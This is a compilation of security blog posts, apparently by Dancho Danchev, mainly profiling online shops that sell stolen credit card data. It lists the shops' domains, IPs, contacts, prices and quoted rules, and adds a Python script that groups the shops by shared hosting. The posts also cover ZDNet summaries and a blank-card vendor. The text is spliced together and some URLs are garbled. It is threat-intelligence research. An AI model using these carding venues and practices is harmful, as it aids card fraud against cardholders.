ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - HOSTED IN THE NETHERLANDS

dumps.cc (redirects to privateservices.ws and trackservices.ws) - 124.217.247.59 - Name server: NS1.IPSTATES.NET - Email: dumps.cc@domainsproxy.net - AS45839, PIRADIUS-AS PIRADIUS NET - HOSTED IN MALAYSIA

privateservices.ws - 217.23.9.92 - Name server: ns1.servicedns.nl - AS49981, WorldStream AS Maasdijk - HOSTED IN THE NETHERLANDS

perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko Sergey Nikolaevich; ICQ: 605099359 - HOSTED IN THE NETHERLANDS

mega4u.biz - 178.162.174.71 - Name server: NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, LEASEWEB-DE - HOSTED IN GERMANY

accessltd.ru - 91.213.175.167 - Name server: ns14.zoneedit.com - Email: admin@accessltd.ru - AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN UKRAINE

pwnshop.cc - 77.79.13.209 - Name server: NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN LITHUANIA

bestdumps.su - 91.213.175.57 - Name server: ns1.1000dns.net - Email: bestdumpssu@live.com; ICQ: 619429330 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

[Screenshot: shop interface (menu: Search Cards, Checkout, My orders, Balance $0.00, Support, Account, Service Rules), funding via Liberty Reserve, and a per-country price list with stock counts, e.g. AU $8.00 (12), BR $7.00 (93), CA $7.00 (6), CN $10.00 (2), GB $9.00 (1), IN $5.00 (7), KR $8.00 (1), MX $10.00 (2), TR $6.00 (19), with further entries between $7.00 and $10.00 and one entry at $9.00 with 122 in stock.]

mycc.su - 188.93.17.180 - Name server: ns1.deltahost.com.ua - Email: admin@mycc.su - AS49505, SELECTEL Ltd. - HOSTED IN RUSSIA

bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - AS50244 - HOSTED IN LATVIA; Associated email: bdsupport@jabber.org; Associated ICQ: 655584

dumpshop.bz - 217.23.9.93 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS

cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS
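The summary points at the top of this post (four domains on identical name servers, four Yahoo and one Live.com registrant, most shops hosted in Ukraine and the Netherlands) are what you get by pivoting the records above on shared infrastructure. The following script is an added example, not code from the original post: it embeds the records listed above as constructed input, transcribed into tuples (the two-letter country codes and the integer ASNs are this example's shorthand for the post's strings, and the approven.su mailbox is transcribed as yurtan20@e1.ru), and groups the gateways by name server, ASN, registrant mailbox provider and IP prefix. The PRIVACY_PROXIES set, which separates WHOIS privacy services from a person's own mailbox, is an assumption of the example.

```python
"""Pivot the gateway reconnaissance records on shared infrastructure."""
from collections import Counter, defaultdict
from ipaddress import ip_network

# Constructed input: the records from the list above, transcribed as
# (domain, IPs, name server, registrant e-mail, ASN, hosting country).
# None marks a field the post does not give; the two-letter country codes
# are this example's shorthand for the post's "HOSTED IN ..." strings.
GATEWAYS = [
    ("ccmall.cc", ["213.5.70.34"], "tr1.onlineshop.su", "gwylhcfktm@whoisservices.cn", 49544, "NL"),
    ("track2.name", ["91.213.175.121"], None, None, 6849, "UA"),
    ("trackstore.su", ["46.21.148.26"], None, "roger.sroy@yahoo.com", 35017, "NL"),
    ("magic-numbers.cc", ["91.213.175.89", "91.223.77.35"], "ns1.1000dns.net", "contact@privacyprotect.org", 6849, "UA"),
    ("allfresh.us", ["46.21.144.115"], "yns1.yahoo.com", "keikomiyahara@yahoo.com", 35017, "NL"),
    ("freshstock.biz", ["38.97.225.166", "69.175.73.184"], "ns1.pipedns.com", "ghmbfvntxs@whoisprivacyprotect.com", 32475, "US"),
    ("bulba.cc", ["91.223.77.254"], "ns1.nameself.com", "bulbacc@yahoo.com", 6849, "UA"),
    ("approven.su", ["91.229.248.20"], "dns1.naunet.ru", "yurtan20@e1.ru", None, "UA"),
    ("cv2shop.com", ["72.20.12.205"], "dns1.name-services.com", "wnfxgjdg@whoisprivacyprotect.com", 25761, "US"),
    ("vzone.tc", ["49.212.25.242"], "dns1.yandex.ru", "adamsnames@rrpproxy.net", 9371, "JP"),
    ("ccstore.ru", ["91.220.101.200"], "ns1.1000dns.net", "ccstoreru@yahoo.com", 49704, "NL"),
    ("dumps.cc", ["124.217.247.59"], "ns1.ipstates.net", "dumps.cc@domainsproxy.net", 45839, "MY"),
    ("privateservices.ws", ["217.23.9.92"], "ns1.servicedns.nl", None, 49981, "NL"),
    ("perfect-numbers.cc", ["91.220.101.75"], "ns1.1000dns.net", None, 49704, "NL"),
    ("mega4u.biz", ["178.162.174.71"], "ns1.freedns.ws", "persiks@online.ua", 28753, "DE"),
    ("accessltd.ru", ["91.213.175.167"], "ns14.zoneedit.com", "admin@accessltd.ru", 6849, "UA"),
    ("pwnshop.cc", ["77.79.13.209"], "ns1.afraid.org", None, 16125, "LT"),
    ("bestdumps.su", ["91.213.175.57"], "ns1.1000dns.net", "bestdumpssu@live.com", 6849, "UA"),
    ("mycc.su", ["188.93.17.180"], "ns1.deltahost.com.ua", "admin@mycc.su", 49505, "RU"),
    ("bestdumps.biz", ["195.3.145.87"], "ns1.bestdumps.biz", "admin@bestdumps.biz", 50244, "LV"),
    ("dumpshop.bz", ["217.23.9.93"], "ns1.servicedns.nl", "contact@privacyprotect.org", 49981, "NL"),
    ("cardshop.bz", ["217.23.9.67"], "ns1.servicedns.nl", "contact@privacyprotect.org", 49981, "NL"),
]

# Mail domains of WHOIS privacy/proxy services seen in the records above, as
# opposed to a person's own mailbox. An assumption of this example.
PRIVACY_PROXIES = {"whoisservices.cn", "whoisprivacyprotect.com",
                   "privacyprotect.org", "domainsproxy.net", "rrpproxy.net"}

NAMESERVER, EMAIL, ASN = 2, 3, 4  # tuple indexes usable with shared()


def shared(records, field):
    """Group domains by one attribute, keeping only values 2+ domains share."""
    groups = defaultdict(list)
    for rec in records:
        value = rec[field]
        if value is not None:
            groups[value].append(rec[0])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def hosting_countries(records):
    """How many gateways are hosted in each country."""
    return Counter(rec[5] for rec in records)


def mailbox_providers(records):
    """Registrant e-mails grouped by provider, e.g. yahoo.com or a WHOIS proxy."""
    providers = defaultdict(list)
    for domain, _ips, _ns, email, _asn, _cc in records:
        if email:
            providers[email.rsplit("@", 1)[1]].append(domain)
    return {k: sorted(v) for k, v in providers.items()}


def hidden_registrants(records):
    """Domains whose registrant hides behind a WHOIS privacy service."""
    return sorted(d for d, _ips, _ns, email, _asn, _cc in records
                  if email and email.rsplit("@", 1)[1] in PRIVACY_PROXIES)


def shared_prefixes(records, prefixlen=24):
    """Group domains whose hosting IPs fall in the same prefix (default /24).
    A /24 hit means the shops sit on the same small block of one hoster;
    widen prefixlen to catch the same allocation, e.g. 46.21.144.0/20."""
    nets = defaultdict(set)
    for domain, ips, *_rest in records:
        for ip in ips:
            nets[str(ip_network(f"{ip}/{prefixlen}", strict=False))].add(domain)
    return {k: sorted(v) for k, v in nets.items() if len(v) > 1}


def report(records):
    """Assemble the pivots behind the post's summary points."""
    return {
        "by_country": dict(hosting_countries(records)),
        "shared_nameservers": shared(records, NAMESERVER),
        "shared_asns": shared(records, ASN),
        "shared_slash24": shared_prefixes(records),
        "mailbox_providers": mailbox_providers(records),
        "privacy_protected": hidden_registrants(records),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(report(GATEWAYS), indent=2))
```

Running the report reproduces the summary points: ns1.1000dns.net serves four of the shops, yahoo.com registered four and live.com one, and the Netherlands and Ukraine host 8 and 6 respectively. The /24 pivot also surfaces what the prose only hints at, namely that four shops share 91.213.175.0/24 on AS6849 and three share 217.23.9.0/24 on WorldStream, which is the kind of overlap that turns a list of domains into a takedown or blocklist request against one provider.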

Let's now take an inside view into each and every one of the above-profiled gateways.

Accessltd.ru

Accessltd.ru is currently offering an inventory of 39,328 U.S.-based stolen credit card details for just $2.10 each, followed by another inventory of 342 U.K.-based credit cards for $9 each, 108 Japanese credit cards for $8 each, another dump of 293 Canadian credit cards for $7 each, and 198 Australian credit cards for $8 each.

According to the service: "We accept Liberty Reserve only. Refund on your wallets is not possible."

Moreover, here's how the service operates based on the Service Rules:

"To check the card is integrated into the platform checker CCChecker, currently the best checker, not only in our opinion. Replacement cards are only based on the result of this checker. Check Card is available immediately after order payment, in the section My Orders. To check, click "Check". Cards checking in for a few seconds. Button "Check" - available within 20 minutes after purchase. Check Card - a paid service, which costs $0.3, if the card is not valid - the cost of cards back to your account automatically.

Replacement card can only be made in the automatic mode. If checker dont working, for replace need screens your checker in the Support section with a description of the problem. These tickets will only be considered if they contain the results of your test, not a "paid for Skype, did not work, replace". We do not care where and how you use the material, loading support extra information is needed. We will check the card manually, and if any parameter is not correct to make you refund.

Sorting: Our shop is available sorted by the following parameters:

1. BIN (Multiple)

2. State (Multiple)

3. City (Multiple)

4. Zip (Multiple)"

[Graph (from screenshot): accessltd.ru resolves to 91.213.175.167 (91.213.175.0/24, AS6849); its name server ns14.zoneedit.com resolves to 216.227.210.10 (216.227.210.0/24, AS15244, PTR under lunarservers.com) and 209.126.137.108 (209.126.128.0/17, AS10439).]

Domain reconnaissance

accessltd.ru - 91.213.175.167 - Name server: ns14.zoneedit.com - Email: admin@accessltd.ru - AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN UKRAINE

AllFresh.us

AllFresh.us is yet another DIY shop for purchasing stolen credit card details, all fresh as the name says.

On 2011/08/04 the service issued an update for "updated US Amex, Discover fresh and good", followed by another update on the next day, this time advertising "updated more ccv FRANCE new and good today."

The price for a stolen card number is static, at $6 per credit card.
[Screenshot: AllFresh.us shop front (budget $0, items 0) with the news items "updated more ccv FRANCE new and good today - Dear customers we updated ccv FRANCE very good and fresh, and very cheap! thanks" and "updated US amex, discover FRESH and GOOD - Dear Customers, we update US amex and discover very good on Agent Adam, thanks!", followed by a listing of nine Canadian cards (provinces AB, BC, NB and NS; Sherwood Park, Nanaimo, Saint Jacques, Halifax, Stillwater Lake, Timberlea) at $6 each.]
Domain reconnaissance

[Graph (from screenshot): allfresh.us resolves to 46.21.144.115 (46.21.144.0/20, AS35017); name servers yns1.yahoo.com and yns2.yahoo.com (ns8.san.yahoo.com and ns9.san.yahoo.com at 98.136.43.32 in 98.136.40.0/21, AS36752, and 98.139.247.192 in 98.139.128.0/17, AS26101); mail is handled by Google (aspmx.l.google.com, alt1/alt2.aspmx.l.google.com, aspmx3/4/5.googlemail.com, AS15169).]

allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiyahara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

Approven.su

Approven.su is a relatively more advanced DIY shop for purchasing stolen credit card details, due to its advanced search options, allowing cybercriminals an easier way to search the dumps/full dumps of stolen credit card details.

The most recent announcement at Approven.su says "Sumer Jam: 8 new bases - Georgia2, California3, Pennsylvania3, Puerto Rico, California4, Texas4, Virginia, California5".

The price for a stolen credit card is $10, with Platinum cards going for $15.
[Screenshot: Approven.su search form with filters for country, bank, service, type, subtype, base, ZIP code and track, the banner "Site will go down for an update in 15 mins. It should be done in an hour." and the note "Refresh the page for a random selection of bins ALL SEARCHES FREE FOR STORE OPENING"; the result listing shows BIN, card type, issuing bank, state and base per card, e.g. VISA DEBIT CLASSIC cards from JPMorgan Chase Bank, Navy Federal Credit Union and Bank of Oklahoma, and a VISA DEBIT PLATINUM card from Bank of America.]

Domain reconnaissance

approven.su - 91.229.248.20 - Name server: dns1.naunet.ru - Email: yurtan20@e1.ru - HOSTED IN UKRAINE

BestDumps.biz 

BestDumps.biz doesn't allow newly registered visitors the 
opportunity to search across its database of stolen credit card 
details, unless they pay $50 using Liberty Reserve. 
[Screenshot: BestDumps.biz login page ("To register please write to bdsupport@jabber.org or 655584") and the post-login Validation page: "You are seconds away to have full access to this site. Before any further use of this site you must pay $50. This amount will be automatically be verified and added to your balance! Notes: If your account is not activated within 24 hours, your account will be removed. If the amount sent is different than $50 your account will not be activated." with a Liberty Reserve payment button.]

Domain reconnaissance

bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - AS50244 - HOSTED IN LATVIA; Associated email: bdsupport@jabber.org; Associated ICQ: 655584





Bulba.cc 


Bulba.cc offers a checker for stolen credit cards.

The most recent announcement is "UPDATE ADDED 1000 MEXICO RARE! FRESH! 95 % VALID!!! Hurry up to load the account."

The service advertises itself as follows:

"Hello my name is Bulba. I am official reseller of TRACK2.NAME service. Bulba.cc opened because track2.name closed registration and don't accept new customers. We don't have any specific rules. Our only rule is "we don't replace bad dumps". That means we don't replace them at all and we don't have replacement policy. Don't ask about it in any case!

We accept Liberty Reserve, WU, MG, Bank Transfer (NEW) without any fees. Minimum for payment by LR - 10 $, WU, MG - 500 $, Bank Transfer - 500 $. Also we give 10 % bonus of money to all purchases.

Our bases: SALES - track2, 50 % valid, a lot dumps! Very cheap $7 per one! DATABASE9 - TRACK1 + TRACK2 (90 %) + TRACK2 (10 %) only! 80 % valid, FRESH. NEW DATABASE, TRACK 2 only, 95 % valid, FRESH! NEW!"

Domain reconnaissance

bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

CardShop.bz

CardShop.bz is yet another DIY interface for purchasing stolen credit card data (dumps/full dumps). The general rules of the site are as follows:

"2.1.1) All calculations on a site and its services - automatic

2.1.2) Minimum funding amount on a site 10 $ that equals to 50 credits

2.1.3) Period of validity of credits is 1 month (under the additional oral agreement term can be increased). In a case if you had not time to spend all credits, it is possible to make fund of your account and credits will automatically be restored

2.1.4) Refund for not used credits - IS NOT POSSIBLE

In order to avoid conflict situations, please check information that you need before funding account"

The Rules of service ONLINE sale CC/DUMPS read:

"2.2) Rules of service ONLINE sale CC/DUMPS

2.2.1) Return of credits for purchased CC/Dumps which have been checked before purchase and have status VALID - IS NOT POSSIBLE

2.2.1) Return of credits for purchased CC/Dumps which have been checked in 1 hour after purchase through the link 'Check' and having status VALID - IS NOT POSSIBLE

2.2.2) Return of credits for purchased invalid CC/Dumps (DECLINE/HOLD CALL/PICKUP) which are not checked before purchase, is possible only within 24 hours after the order. After 24 hours any claims on return of credits are not accepted

2.2.3) You will not be charged for invalid CC/Dumps if you checked it instant or in 1 hour and credits will be refunded automatically. You will be charged only for CC/Dumps checking even if CC/Dumps is invalid

2.2.4) We do not guarantee limits and amounts on CC/Dumps

2.3) Rules of service ONLINE Check CC/Dumps

2.3.1) Status Valid, means that at the moment of check CC/Dump was Approved

2.3.2) Status Declined, means that at the moment of check CC/Dump was Decline/Pickup/Hold Call

2.3.3) Claims on checked DUMP/CC are not accepted.

2.7) Rules of other services on site CardShop will be added in this agreement later

3) Prices and Tariffs

3.1.1) 1 credit is accepted to a unit of account on site CardShop. Initially 1 credit = 1 $. The price for 1 credit can change according to tariffs for funding. Tariffs could be found in Tariff section at site

3.1.2) Administration CardShop reserves the right to itself at any moment to change tariffs. You agree periodically check tariffs on site CardShop to learn about possible changes in them"

The site is currently offering 33,903 U.S.-based stolen credit cards for sale. The web site is also offering proxies for sale (compromised malware-infected hosts) at $0.3 per proxy. Next to the inventory of stolen credit cards and the proxy service, the site also offers batch checking of the validity of the stolen credit cards, and performs SSN and MMN (mother's maiden name) lookups, with the ability to look up MMN for the state of California.

Domain reconnaissance

cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS

CcMall.cc

CcMall.cc is associated with the following ICQ number - 777605, which potential buyers have to contact in order to be offered the ability to register on the site. "For private limited registration only into the new shop" is currently displayed on CcMall.cc's web site.

Domain reconnaissance

ccmall.cc - 213.5.70.34 - Name server: TR1.ONLINESHOP.SU - Email: gwylhcfktm@whoisservices.cn - AS49544, INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS; Name server: tr1.onlineshop.su - Email: exchangers@msn.com; context.cx is also registered using exchangers@msn.com.

ccStore.ru

ccStore.ru is associated with the following ICQ - 20606, and requires that a valid email address be supplied in order to activate access to yet another interface for selling and reselling fraudulently obtained financial data.

Domain reconnaissance

ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - HOSTED IN THE NETHERLANDS

Cv2Shop.com

Cv2Shop.com has an inventory of 734 U.S.-based stolen credit cards, priced per piece at $2.2 for Discover, $2 for Amex, $2 for Mastercard and $1.7 for Visa. The fraudulent interface is also offering 80 Canadian stolen credit cards at $7 per piece for Discover and Amex, $6 for Mastercard and $5 for Visa.

Domain reconnaissance

cv2shop.com - 72.20.12.205 - Name server: DNS1.NAME-SERVICES.COM - Email: wnfxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM - HOSTED IN THE UNITED STATES

Freshstock.biz

FreshStock.biz is associated with the following ICQ - 607373112, which users have to contact in order to obtain access to the DIY shop for stolen credit cards.

Domain reconnaissance

freshstock.biz - 38.97.225.166; 69.175.73.184 - Name server: NS1.PIPEDNS.COM - Email: ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. - HOSTED IN THE UNITED STATES


Magic-Numbers.cc

Magic-Numbers.cc is associated with the following ICQ - 333277 and Jabber: elche@jabber.org, which users wanting bulk orders have to contact. The web site is currently offering 24,642 U.S.-based stolen credit cards, followed by another 1,545 Israeli credit cards, with the total number of dumps currently on offer at 43,507. The most recent advertisement reads: "Australia base, ultra virgin fresh base - track2 available. Approval rate 85 %"

Domain reconnaissance

magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name server: NS1.1000DNS.NET - Email: contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE


Mega4u.biz

mega4u.biz is currently closed for free registration.

Domain reconnaissance

mega4u.biz - 178.162.174.71 - Name server: NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, LEASEWEB-DE - HOSTED IN GERMANY

MyCc.su

MyCc.su is associated with the following ICQ - 40040000 and, next to offering stolen credit cards for sale, is also soliciting security vulnerabilities: "Found a bug? We will pay!". The latest update from September 29 says that 1,500 EU-based stolen credit cards have been added, followed by another update from the same date, this time with 300 French stolen credit cards added.

The price of the stolen credit cards varies between $2 and $5.

Domain reconnaissance

mycc.su - 188.93.17.180 - Name server: ns1.deltahost.com.ua - Email: admin@mycc.su - AS49505, SELECTEL Ltd. - HOSTED IN RUSSIA

Perfect-Numbers.cc

Perfect-Numbers.cc is yet another DIY interface for purchasing stolen credit cards. It's associated with the following ICQ - 605099359. Users are able to search within the interface only after they have refilled their balance using Liberty Reserve as a means of payment.

Domain reconnaissance

perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko Sergey Nikolaevich; ICQ: 605099359 - HOSTED IN THE NETHERLANDS

Privateservices.ws

privateservices.ws currently has a database of 634 U.K.-based stolen credit cards, and another 293 French stolen credit cards.

Domain reconnaissance

privateservices.ws - 217.23.9.92 - Name server: ns1.servicedns.nl - AS49981, WorldStream AS Maasdijk - HOSTED IN THE NETHERLANDS

pwnshop.cc

pwnshop.cc is yet another DIY interface for selling stolen credit card numbers. The web site is currently returning the following message: "You can obtain registration code only from exist clients. Please be aware of scam - registration code is free for exist clients, so if you pay for it - ask for refund."

Domain reconnaissance

pwnshop.cc - 77.79.13.209 - Name server: NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN LITHUANIA


TrackStore.su

trackstore.su is offering existing clients the option to refer additional customers for the price of $20 each. The web site is currently offering 1,648 U.S.-based stolen credit cards, exclusively from SunTrust Bank, for the price of $10 per stolen credit card.

Domain reconnaissance

trackstore.su - 46.21.148.26 - Email: roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

Track2.name

track2.name is offering stolen credit card numbers for the price of $20 per stolen credit card.

Domain reconnaissance

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

vzone.tc

vzone.tc is yet another DIY shop for stolen credit card numbers. The current announcement reads: "Dear users, after you buy cards, to view proper information, please click download all cards or download selected card from My Cards page. It will show you all information like Last Name and all the additional info like phone, email.

P.S If you dislike new shop V.2 of our shop, then please use support link and send us your feedback to admin, if you want to back old shop V.1 then send feedback with proper reasons why u again want to see old shop V.1"

The current price for a stolen credit card is $1.80 per card. Next to offering stolen credit cards as a service, the shop also offers an SSN and DOB searcher, as well as the opportunity for customers to purchase proxies (compromised malware-infected hosts).

Domain reconnaissance

vzone.tc - 49.212.25.242 - Name server: dns1.yandex.ru - Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C SAKURA Internet - HOSTED IN JAPAN

DumpsCheck.com

dumpscheck.com, associated with the following ICQ - 612303315, is an advanced checker for the validity of stolen credit card details. The web site says "Current merchant accepts VISA, MASTERCARD, AMEX, DISCOVER, DINERS, JCB."

Domain reconnaissance

dumpscheck.com - 206.217.196.47 - Name server: NS1.DUMPSCHECK.COM - ICQ: 612303315; AS4436, NLAYER Communications, Inc. - HOSTED IN THE UNITED STATES

Related posts on the economics of cybercrime: 


[7] New report details the prices within the 
cybercrime market 

[ 8 ] CardCops: Stolen credit card details getting 
cheaper 

[9] Microsoft study debunks profitability of the 
underground economy 

[10] Are Stolen Credit Card Details Getting Cheaper? 

[11] Squeezing the Cybercrime Ecosystem in 2009 

[12] Price Discrimination in the Market for Stolen 
Credit Cards 

[13] The Underground Economy's Supply of Goods 

[14] Microsoft study debunks phishing profitability 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 

1. http://www.zdnet.com/blog/security/cardcops-stolen-credit-card-details-getting-cheaper/2084

2. http://ddanchev.blogspot.com/2008/07/are-stolen-credit-card-details-getting.html

3. http://ddanchev.blogspot.com/2008/06/price-discrimination-in-market-for.html

4. http://www.zdnet.com/blog/security/scammers-introduce-atm-skimmers-with-built-in-sms-notification/2000

5. http://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.html

6. http://ddanchev.blogspot.com/2008/06/price-discrimination-in-market-for.html

7. http://www.zdnet.com/blog/security/new-report-details-the-prices-within-the-cybercrime-market/8078

8. http://www.zdnet.com/blog/security/cardcops-stolen-credit-card-details-getting-cheaper/2084

9. http://www.zdnet.com/blog/security/microsoft-study-debunks-profitability-of-the-underground-economy/3522

10. http://ddanchev.blogspot.com/2008/07/are-stolen-credit-card-details-getting.html

11. http://ddanchev.blogspot.com/2009/01/squeezing-cybecrime-ecosystem-in-2009.html

12. http://ddanchev.blogspot.com/2008/06/price-discrimination-in-market-for.html

13. http://ddanchev.blogspot.com/2007/03/underground-economys-supply-of-goods.html

14. http://www.zdnet.com/blog/security/microsoft-study-debunks-phishing-profitability/2366

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for October (2011-12-04 21:05)

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for October. You can subscribe to my 

[1]personal RSS feed, [2]Zero Day's main feed, or

follow me on Twitter: 

01. [3]iPhone 5 themed emails serve Windows 
malware 

02 . [ 4]27 of 100 tested Chrome extensions contain 51 
vulnerabilities 

03 . [ 5]37 percent of users browsing the Web with 
insecure Java versions 

04. [6]Google introduces Safe Browsing Alerts for 
network administrators 

05. [7]Malware Watch: U.S Chamber of Commerce 
official letter; DHL delivery error, IRS notifications 


06. [8]'Steve Jobs Alive!' emails lead to exploits and malware

07. [9]Which is the most popular malware propagation 
tactic? 


08. [10]Spamvertised 'Cancellation of the package 
delivery' emails serving malware 

09. [11]Hacking group from Nepal posts 10,000 stolen Facebook accounts online

10. [12]Over a million web sites affected in mass SQL 
injection attack 

11. [13]New Mac OS X malware disables Apple's 
malware protection 

12. [14]New Mac OS X malware with DDoS 
functionality spotted in the wild 

13. [15]Security researcher finds major security flaw 
in Facebook 

This post has been reproduced from [16]Dancho Danchev's blog. Follow him [17]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin;content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/iphone-5-themed-emails-serve-windows-malware/9534

4. http://www.zdnet.com/blog/security/27-of-100-tested-chrome-extensions-contain-51-vulnerabilities/9537

5. http://www.zdnet.com/blog/security/37-percent-of-users-browsing-the-web-with-insecure-java-versions/9541

6. http://www.zdnet.com/blog/security/google-introduces-safe-browsing-alerts-for-network-administrators/9569

7. http://www.zdnet.com/blog/security/malware-watch-us-chamber-of-commerce-official-letter-dhl-delivery-error-irs-notifications/9572

8. http://www.zdnet.com/blog/security/steve-jobs-alive-emails-lead-to-exploits-and-malware/9587

9. http://www.zdnet.com/blog/security/which-is-the-most-popular-malware-propagation-tactic/9638

10. http://www.zdnet.com/blog/security/spamvertised-cancellation-of-the-package-delivery-emails-serving-malware/9654

11. http://www.zdnet.com/blog/security/hacking-group-from-nepal-posts-10000-stolen-facebook-accounts-online/9658

12. http://www.zdnet.com/blog/security/over-a-million-web-sites-affected-in-mass-sql-injection-attack/9662

13. http://www.zdnet.com/blog/security/new-mac-os-x-malware-disables-apples-malware-protection/9665

14. http://www.zdnet.com/blog/security/new-mac-os-x-malware-with-ddos-functionality-spotted-in-the-wild/9701

15. http://www.zdnet.com/blog/security/security-researcher-finds-major-security-flaw-in-facebook/9704

16. http://ddanchev.blogspot.com/

17. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for November (2012-01-01 20:59)

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for November. You can subscribe to my 

[1]personal RSS feed, [2]Zero Day's main feed, or

follow me on Twitter: 

01. [3]Massive DNS poisoning attack in Brazil serving 
exploits and malware 

02. [4]South Korea to block port 25 as anti-spam 
countermeasure 

03. [5]Researchers spot malware using a stolen 
government certificate 

04. [6]SCADA systems at the Water utilities in Illinois, 
Houston, hacked 

05. [7]New Facebook worm spreading 


06. [8]Popular free antivirus apps for Android fail anti-malware tests

This post has been reproduced from [9]Dancho Danchev's blog. Follow him [10]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev? 
o=l&mode=rss&ta a = mantle_skin : content 

2. http://feeds.feedbumer.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/massive-dns- 
poisonin a -attack-in-brazil-servin a -exploits-and-mal ware/97 
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4. http://www.zdnet.com/blo a /securitv/south-korea-to-block- 
oort-25-as-anti-soam-countermeasu re/9789 

5. http://www.zdnet.com/blo a /securitv/researchers-soot- 
malware-usin a -a-stolen- a overnment-certificate/9813 

6. http://www.zdnet.com/blo a /securitv/scada-svstems-at-the- 
water-utilities-in-illinois-houston-hacked/9821 

7. http://www.zdnet.com/blo a /securitv/new-facebook-worm- 
s preadin a /9825 

8. http://www.zdnet.com/blo a /securit v/po pular-free-antivirus- 
ap ps-for-android-fail-anti-mal ware-tests/9830 

9. http://ddanchev.blo as pot.com/ 

10. http://twitter.com/danchodanchev 
Summarizing ZDNet's Zero Day Posts for December (2012-01-01 21:02)

The following is a brief summary of all of my posts at ZDNet's Zero Day for December. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]New study claims that Chrome is the most secure browser

02. [4]FTC issues refunds to scareware victims

03. [5]Yahoo! Mail introduces two factor authentication

04. [6]Web malware exploitation kits updated with new Java exploit

05. [7]Cybercriminals exploiting the death of Kim Jong-Il

06. [8]Localized ransomware variants impersonate law enforcement agencies

07. [9]Cybercriminals hijack Facebook accounts through bogus browser extensions

08. [10]Amnesty International UK compromised, serving exploits and malware

This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?

9. http://www.zdnet.com/blog/security/cybercriminals-hijack-

ns/9858

12. http://twitter.com/danchodanchev
Profiling a Vendor of Visa/Mastercard Plastics and Holograms (2012-01-03 20:04)

What is it that cybercriminals need once they have obtained access to [1]stolen financial data? Next to [2]money mules, it is blank plastic cards onto which they will later embed the stolen financial data.

Let's profile a vendor of blank Visa/Mastercard plastic cards and holograms in order to gain a better picture of just how easy it is to obtain such plastic cards.

Associated nickname: pizzA

Associated ICQ: 496 872 531

Associated email: plastics@safe-mail.net

Translated vendor's proposition:

Plastics - Blanks:

1-50 = 15 each

51-100 = 14 each

101+ = 13 each

201+ = 12 each

Plastics - Embossed:

1 and up = 20 each

101+ = 18 each

201+ = 17 each

Minimum order: 200 USD

Shipping to: USA, International orders (min $800 + shipping)

Plastics have UV Security print on Front and Back.

Hologram Stickers and Heat press:

VISA - Silver/Gold

VISA mini - Silver/Gold

MasterCard - Silver/Gold

Minimum order on stickers: 500 pcs

Minimum order on Heat press: 1000 pcs

$0.8 per hologram

PAYMENT:

Liberty Reserve (Preferred)

Western Union (500 USD minimum + 8% WU fee)

RULES:

- Any order, question feel free to ask in ICQ.

- Shipping time 24-48 after the money is picked up.

- PLEASE USE THIS TOPIC ONLY FOR FEEDBACK, ANY QUESTION AND ORDERS in ICQ.

- If you buy from me it means you agreed to my rules.

Screenshots of his inventory of Visa and Mastercard plastics and holograms:

This post has been reproduced from [3]Dancho Danchev's blog. Follow him [4]on Twitter.

1. http://ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards.html
